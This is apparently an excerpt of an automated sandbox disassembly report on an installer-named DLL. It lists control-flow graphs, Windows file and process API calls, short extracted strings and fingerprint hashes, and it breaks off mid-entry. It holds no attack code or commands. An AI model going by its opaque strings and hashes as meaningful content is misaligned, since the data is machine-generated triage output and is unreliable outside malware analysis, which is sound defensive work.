                                            control_flow_graph 6933 6c7a406c-6c7a409c call 6c7a44ec 6936 6c7a409e-6c7a40a9 call 6c78f9df 6933->6936 6937 6c7a40b7-6c7a40c3 call 6c7a160c 6933->6937 6942 6c7a40ab-6c7a40b2 call 6c78f9cc 6936->6942 6943 6c7a40dc-6c7a4125 call 6c7a4457 6937->6943 6944 6c7a40c5-6c7a40da call 6c78f9df call 6c78f9cc 6937->6944 6953 6c7a4391-6c7a4395 6942->6953 6951 6c7a4192-6c7a419b GetFileType 6943->6951 6952 6c7a4127-6c7a4130 6943->6952 6944->6942 6957 6c7a419d-6c7a41ce GetLastError call 6c78f9f2 CloseHandle 6951->6957 6958 6c7a41e4-6c7a41e7 6951->6958 6955 6c7a4132-6c7a4136 6952->6955 6956 6c7a4167-6c7a418d GetLastError call 6c78f9f2 6952->6956 6955->6956 6962 6c7a4138-6c7a4165 call 6c7a4457 6955->6962 6956->6942 6957->6942 6972 6c7a41d4-6c7a41df call 6c78f9cc 6957->6972 6960 6c7a41e9-6c7a41ee 6958->6960 6961 6c7a41f0-6c7a41f6 6958->6961 6965 6c7a41fa-6c7a4248 call 6c7a17b0 6960->6965 6961->6965 6966 6c7a41f8 6961->6966 6962->6951 6962->6956 6975 6c7a424a-6c7a4256 call 6c7a4666 6965->6975 6976 6c7a4267-6c7a428f call 6c7a4710 6965->6976 6966->6965 6972->6942 6975->6976 6984 6c7a4258 6975->6984 6982 6c7a4291-6c7a4292 6976->6982 6983 6c7a4294-6c7a42d5 6976->6983 6985 6c7a425a-6c7a4262 call 6c79b925 6982->6985 6986 6c7a42f6-6c7a4304 6983->6986 6987 6c7a42d7-6c7a42db 6983->6987 6984->6985 6985->6953 6989 6c7a430a-6c7a430e 6986->6989 6990 6c7a438f 6986->6990 6987->6986 6988 6c7a42dd-6c7a42f1 6987->6988 6988->6986 6989->6990 6992 6c7a4310-6c7a4343 CloseHandle call 6c7a4457 6989->6992 6990->6953 6996 6c7a4377-6c7a438b 6992->6996 6997 6c7a4345-6c7a4371 GetLastError call 6c78f9f2 call 6c7a171f 6992->6997 6996->6990 6997->6996
                                            APIs
                                              • Part of subcall function 6C7A4457: CreateFileW.KERNEL32(00000000,00000000,?,6C7A4115,?,?,00000000,?,6C7A4115,00000000,0000000C), ref: 6C7A4474
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A4180
                                            • __dosmaperr.LIBCMT ref: 6C7A4187
                                            • GetFileType.KERNEL32(00000000), ref: 6C7A4193
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A419D
                                            • __dosmaperr.LIBCMT ref: 6C7A41A6
                                            • CloseHandle.KERNEL32(00000000), ref: 6C7A41C6
                                            • CloseHandle.KERNEL32(6C79B0D0), ref: 6C7A4313
                                            • GetLastError.KERNEL32 ref: 6C7A4345
                                            • __dosmaperr.LIBCMT ref: 6C7A434C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                            • String ID: 8Q
                                            • API String ID: 4237864984-4022487301
                                            • Opcode ID: 38eb51bb185ddafb977041b0258725087a37bb1702ad371b4722c0de0f47787c
                                            • Instruction ID: f28bae1c159816105baec86b09eaaab8fcb8e968de728acf1dd63aa7d96ac896
                                            • Opcode Fuzzy Hash: 38eb51bb185ddafb977041b0258725087a37bb1702ad371b4722c0de0f47787c
                                            • Instruction Fuzzy Hash: 57A14732A041449FCF098FA8C955BAE7BB1EB07328F145269E911EB791CB368817EB51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 7002 6c75c1e0-6c75c239 call 6c786b70 7005 6c75c260-6c75c269 7002->7005 7006 6c75c2b0-6c75c2b5 7005->7006 7007 6c75c26b-6c75c270 7005->7007 7010 6c75c2b7-6c75c2bc 7006->7010 7011 6c75c330-6c75c335 7006->7011 7008 6c75c2f0-6c75c2f5 7007->7008 7009 6c75c272-6c75c277 7007->7009 7012 6c75c431-6c75c448 WriteFile 7008->7012 7013 6c75c2fb-6c75c300 7008->7013 7016 6c75c372-6c75c3df WriteFile 7009->7016 7017 6c75c27d-6c75c282 7009->7017 7018 6c75c407-6c75c41b 7010->7018 7019 6c75c2c2-6c75c2c7 7010->7019 7014 6c75c489-6c75c4b9 call 6c78b3a0 7011->7014 7015 6c75c33b-6c75c340 7011->7015 7021 6c75c452-6c75c47f call 6c78b920 ReadFile 7012->7021 7020 6c75c306-6c75c30b 7013->7020 7013->7021 7014->7005 7023 6c75c346-6c75c36d 7015->7023 7024 6c75c4be-6c75c4c3 7015->7024 7025 6c75c3e9-6c75c3fd WriteFile 7016->7025 7017->7025 7026 6c75c288-6c75c28d 7017->7026 7027 6c75c41f-6c75c42c 7018->7027 7028 6c75c2cd-6c75c2d2 7019->7028 7029 6c75c23b-6c75c250 7019->7029 7020->7005 7032 6c75c311-6c75c32b 7020->7032 7021->7014 7033 6c75c253-6c75c258 7023->7033 7024->7005 7035 6c75c4c9-6c75c4d7 7024->7035 7025->7018 7026->7005 7036 6c75c28f-6c75c2aa 7026->7036 7027->7005 7028->7005 7030 6c75c2d4-6c75c2e7 7028->7030 7029->7033 7030->7033 7032->7027 7033->7005 7036->7033
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: :uW$;uW$;uW$> 4!$> 4!
                                            • API String ID: 0-4100612575
                                            • Opcode ID: 73a2acd2d5ec405ffff8bd2330b637d2fa5dd746acc6e4f3422ee646c2368426
                                            • Instruction ID: 955e2d8f93f047fb6f4797f37019af65ce4bca1acdad2a0041cf9209a274e1ff
                                            • Opcode Fuzzy Hash: 73a2acd2d5ec405ffff8bd2330b637d2fa5dd746acc6e4f3422ee646c2368426
                                            • Instruction Fuzzy Hash: 7E71ACB0209344AFD710DF58C980B5ABBF4BF8A709F50892EF598D6650DB71D898CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: K?Jo$K?Jo$`Rlx$7eO
                                            • API String ID: 0-174837320
                                            • Opcode ID: bd6f02659e42e94aad26ee0e34327332785c0f9889e7ce1be15c739c5baaff67
                                            • Instruction ID: 6a59ed5143472ce03dee0a427f0001a935fe532fa5a60f2498321e24548eba7a
                                            • Opcode Fuzzy Hash: bd6f02659e42e94aad26ee0e34327332785c0f9889e7ce1be15c739c5baaff67
                                            • Instruction Fuzzy Hash: 4E4267B4609341CFD754CF28C590A2ABBE1AFC9314FA48D2EE59587B20DB34E865CB53
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ;T55
                                            • API String ID: 0-2572755013
                                            • Opcode ID: db3e14080294ae66a545100dada03f87014401bc47d971babacddc6d402eea3b
                                            • Instruction ID: ba77142c101bc7110a1f00d03795a845ec9dc7d93faa40a18f9065a7aa8df7d1
                                            • Opcode Fuzzy Hash: db3e14080294ae66a545100dada03f87014401bc47d971babacddc6d402eea3b
                                            • Instruction Fuzzy Hash: 6903F431649B018FC728CF2CC8D06A6B7E3AFD53257198B2DC0A64BE95DB74B44ACB45

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 7579 6c784ff0-6c785077 CreateProcessA 7580 6c7850ca-6c7850d3 7579->7580 7581 6c7850f0-6c78510b 7580->7581 7582 6c7850d5-6c7850da 7580->7582 7581->7580 7583 6c7850dc-6c7850e1 7582->7583 7584 6c785080-6c7850c2 WaitForSingleObject CloseHandle * 2 7582->7584 7583->7580 7585 6c7850e3-6c785118 7583->7585 7584->7580
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID: D
                                            • API String ID: 963392458-2746444292
                                            • Opcode ID: 501e9244c889d75f71949f8b5be16db45f485b76cbed6b4c5d1a9f6a00beea3c
                                            • Instruction ID: 0b5a48d2eed445b9d8c9773c06434330cc8dad7a66dda2d6b10cfa3f072d3257
                                            • Opcode Fuzzy Hash: 501e9244c889d75f71949f8b5be16db45f485b76cbed6b4c5d1a9f6a00beea3c
                                            • Instruction Fuzzy Hash: 3831E27180A3408FE750DF28D19872EBBF0EBDA318F505A2DF59A96250E7759588CF83

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 7587 6c79bc5e-6c79bc7a 7588 6c79be39 7587->7588 7589 6c79bc80-6c79bc82 7587->7589 7590 6c79be3b-6c79be3f 7588->7590 7591 6c79bca4-6c79bcc5 7589->7591 7592 6c79bc84-6c79bc97 call 6c78f9df call 6c78f9cc call 6c790120 7589->7592 7594 6c79bccc-6c79bcd2 7591->7594 7595 6c79bcc7-6c79bcca 7591->7595 7609 6c79bc9c-6c79bc9f 7592->7609 7594->7592 7597 6c79bcd4-6c79bcd9 7594->7597 7595->7594 7595->7597 7599 6c79bcdb-6c79bce7 call 6c79ac69 7597->7599 7600 6c79bcea-6c79bcfb call 6c79be40 7597->7600 7599->7600 7607 6c79bcfd-6c79bcff 7600->7607 7608 6c79bd3c-6c79bd4e 7600->7608 7610 6c79bd01-6c79bd09 7607->7610 7611 6c79bd26-6c79bd32 call 6c79beb1 7607->7611 7612 6c79bd50-6c79bd59 7608->7612 7613 6c79bd95-6c79bdb7 WriteFile 7608->7613 7609->7590 7614 6c79bdcb-6c79bdce 7610->7614 7615 6c79bd0f-6c79bd1c call 6c79c25b 7610->7615 7623 6c79bd37-6c79bd3a 7611->7623 7619 6c79bd5b-6c79bd5e 7612->7619 7620 6c79bd85-6c79bd93 call 6c79c2c3 7612->7620 7617 6c79bdb9-6c79bdbf GetLastError 7613->7617 7618 6c79bdc2 7613->7618 7625 6c79bdd1-6c79bdd6 7614->7625 7631 6c79bd1f-6c79bd21 7615->7631 7617->7618 7624 6c79bdc5-6c79bdca 7618->7624 7626 6c79bd60-6c79bd63 7619->7626 7627 6c79bd75-6c79bd83 call 6c79c487 7619->7627 7620->7623 7623->7631 7624->7614 7632 6c79bdd8-6c79bddd 7625->7632 7633 6c79be34-6c79be37 7625->7633 7626->7625 7634 6c79bd65-6c79bd73 call 6c79c39e 7626->7634 7627->7623 7631->7624 7637 6c79be09-6c79be15 7632->7637 7638 6c79bddf-6c79bde4 7632->7638 7633->7590 7634->7623 7642 6c79be1c-6c79be2f call 6c78f9cc call 6c78f9df 7637->7642 7643 6c79be17-6c79be1a 7637->7643 7639 6c79bdfd-6c79be04 call 6c78f9f2 7638->7639 7640 6c79bde6-6c79bdf8 call 6c78f9cc call 6c78f9df 7638->7640 7639->7609 7640->7609 7642->7609 7643->7588 7643->7642
                                            APIs
                                              • Part of subcall function 6C79BEB1: GetConsoleCP.KERNEL32(?,6C79B0D0,?), ref: 6C79BEF9
                                            • WriteFile.KERNEL32(?,?,6C7A46EC,00000000,00000000,?,00000000,00000000,6C7A5AB6,00000000,00000000,?,00000000,6C79B0D0,6C7A46EC,00000000), ref: 6C79BDAF
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C7A46EC,6C79B0D0,00000000,?,?,?,?,00000000,?), ref: 6C79BDB9
                                            • __dosmaperr.LIBCMT ref: 6C79BDFE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                            • String ID: 8Q
                                            • API String ID: 251514795-4022487301
                                            • Opcode ID: c4caef6a872f861dbe897cad164d8f67c18164fb7fded0925e2095e2ca3bdfc5
                                            • Instruction ID: 7bcaf298c15455fbace6753fdc2e93def3aa8f867eb9baa7e9309e74d65a7639
                                            • Opcode Fuzzy Hash: c4caef6a872f861dbe897cad164d8f67c18164fb7fded0925e2095e2ca3bdfc5
                                            • Instruction Fuzzy Hash: B3511971A0120AAFDF20DFA8DA49FEEBB79EF0631CF140465D500A7A51D730A905C7A1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 7654 6c785b90-6c785b9c 7655 6c785bdd 7654->7655 7656 6c785b9e-6c785ba9 7654->7656 7659 6c785bdf-6c785c57 7655->7659 7657 6c785bab-6c785bbd 7656->7657 7658 6c785bbf-6c785bcc call 6c6501f0 call 6c790b18 7656->7658 7657->7658 7668 6c785bd1-6c785bdb 7658->7668 7661 6c785c59-6c785c81 7659->7661 7662 6c785c83-6c785c89 7659->7662 7661->7662 7664 6c785c8a-6c785d49 call 6c652250 call 6c652340 call 6c789379 call 6c64e010 call 6c787088 7661->7664 7668->7659
                                            APIs
                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C785D31
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: Ios_base_dtorstd::ios_base::_
                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                            • API String ID: 323602529-1866435925
                                            • Opcode ID: ca5dd747e28b65386fac304b35d38ad733db4612a7fd4930d28ab372dbfeb806
                                            • Instruction ID: c8c9f697b6a60d86cdd03a2a99bed3ffe61296ec7e393baf1c967ca2ca148c89
                                            • Opcode Fuzzy Hash: ca5dd747e28b65386fac304b35d38ad733db4612a7fd4930d28ab372dbfeb806
                                            • Instruction Fuzzy Hash: EA5154B5501B008FD725CF29CA85B97BBF1FB89308F108A2DD9864BB90D775A909CF90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 7699 6c79b925-6c79b939 call 6c7a15a2 7702 6c79b93b-6c79b93d 7699->7702 7703 6c79b93f-6c79b947 7699->7703 7706 6c79b98d-6c79b9ad call 6c7a171f 7702->7706 7704 6c79b949-6c79b950 7703->7704 7705 6c79b952-6c79b955 7703->7705 7704->7705 7710 6c79b95d-6c79b971 call 6c7a15a2 * 2 7704->7710 7708 6c79b973-6c79b983 call 6c7a15a2 CloseHandle 7705->7708 7709 6c79b957-6c79b95b 7705->7709 7716 6c79b9bb 7706->7716 7717 6c79b9af-6c79b9b9 call 6c78f9f2 7706->7717 7708->7702 7720 6c79b985-6c79b98b GetLastError 7708->7720 7709->7708 7709->7710 7710->7702 7710->7708 7718 6c79b9bd-6c79b9c0 7716->7718 7717->7718 7720->7706
                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,6C7A425F), ref: 6C79B97B
                                            • GetLastError.KERNEL32(?,00000000,?,6C7A425F), ref: 6C79B985
                                            • __dosmaperr.LIBCMT ref: 6C79B9B0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: CloseErrorHandleLast__dosmaperr
                                            • String ID:
                                            • API String ID: 2583163307-0
                                            • Opcode ID: cffcd37b714bce9767fde059cb738982c249a716d20a58a1d87f951e937b2fef
                                            • Instruction ID: 399bde8dfb0354db9da4e593ee93c73695228d9b060d3f394bbb4d2a48ef0cad
                                            • Opcode Fuzzy Hash: cffcd37b714bce9767fde059cb738982c249a716d20a58a1d87f951e937b2fef
                                            • Instruction Fuzzy Hash: C9014233665120DBD720067AB64D75D3F694F8373CF250379E91687BC0DF60E4498290

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 7944 6c790b9c-6c790ba7 7945 6c790ba9-6c790bbc call 6c78f9cc call 6c790120 7944->7945 7946 6c790bbe-6c790bcb 7944->7946 7957 6c790c10-6c790c12 7945->7957 7948 6c790bcd-6c790be2 call 6c790cb9 call 6c79873e call 6c799c60 call 6c79b898 7946->7948 7949 6c790c06-6c790c0f call 6c79ae75 7946->7949 7963 6c790be7-6c790bec 7948->7963 7949->7957 7964 6c790bee-6c790bf1 7963->7964 7965 6c790bf3-6c790bf7 7963->7965 7964->7949 7965->7949 7966 6c790bf9-6c790c05 call 6c7947bb 7965->7966 7966->7949
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8Q
                                            • API String ID: 0-4022487301
                                            • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                            • Instruction ID: 1de6cca2042661af20d2cb18d53c5beecb5c83240cbb4844752b9a4261905277
                                            • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                            • Instruction Fuzzy Hash: 0EF0F4325116546ADA211A3ABF0CBDB36F89F4B37CF100725E97493ED0DB70D40AC6A1
                                            APIs
                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C785AB4
                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C785AF4
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: Ios_base_dtorstd::ios_base::_
                                            • String ID:
                                            • API String ID: 323602529-0
                                            • Opcode ID: 496b1c5de5bcf1b34537388f6c59c2c1bd0a9705b9e57f43272926c7c30b1ecf
                                            • Instruction ID: 5f6b2094a8b4baf7332a1c3f0919d24316ae419e386dbc54ac601714083e6ef6
                                            • Opcode Fuzzy Hash: 496b1c5de5bcf1b34537388f6c59c2c1bd0a9705b9e57f43272926c7c30b1ecf
                                            • Instruction Fuzzy Hash: E1516871101B00DBE725CF25C988BE2BBE4BB04718F448A2CE5AB4BB91DB34B549CB81
                                            APIs
                                            • GetLastError.KERNEL32(6C7B6DD8,0000000C), ref: 6C78EF52
                                            • ExitThread.KERNEL32 ref: 6C78EF59
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: ErrorExitLastThread
                                            • String ID:
                                            • API String ID: 1611280651-0
                                            • Opcode ID: 371071df8bed4ac0852f536bbabb82450c4caf55bedc0f27e27e83e160b99972
                                            • Instruction ID: 2c40df3022d42c1111a5326a1b513293900edf39d4be4685dae2e2200f4f0dbe
                                            • Opcode Fuzzy Hash: 371071df8bed4ac0852f536bbabb82450c4caf55bedc0f27e27e83e160b99972
                                            • Instruction Fuzzy Hash: BFF0C275A01604AFDF049FB0D60DAAE3B74FF41618F244269E115A7B51CB30AA05DBE1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: __wsopen_s
                                            • String ID:
                                            • API String ID: 3347428461-0
                                            • Opcode ID: 9b4a4eb16f0f381339f66755ce900001f48c727bef7c8bf31a08f96d7c586c64
                                            • Instruction ID: a5678707ddcda8e0c0b5c92b9a0298d6f72569101082136517178427581edbe4
                                            • Opcode Fuzzy Hash: 9b4a4eb16f0f381339f66755ce900001f48c727bef7c8bf31a08f96d7c586c64
                                            • Instruction Fuzzy Hash: 9E114C71A0420EAFCF05CF59E94599B7BF8EF89318F144069F805AB311D671E911CBA4
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
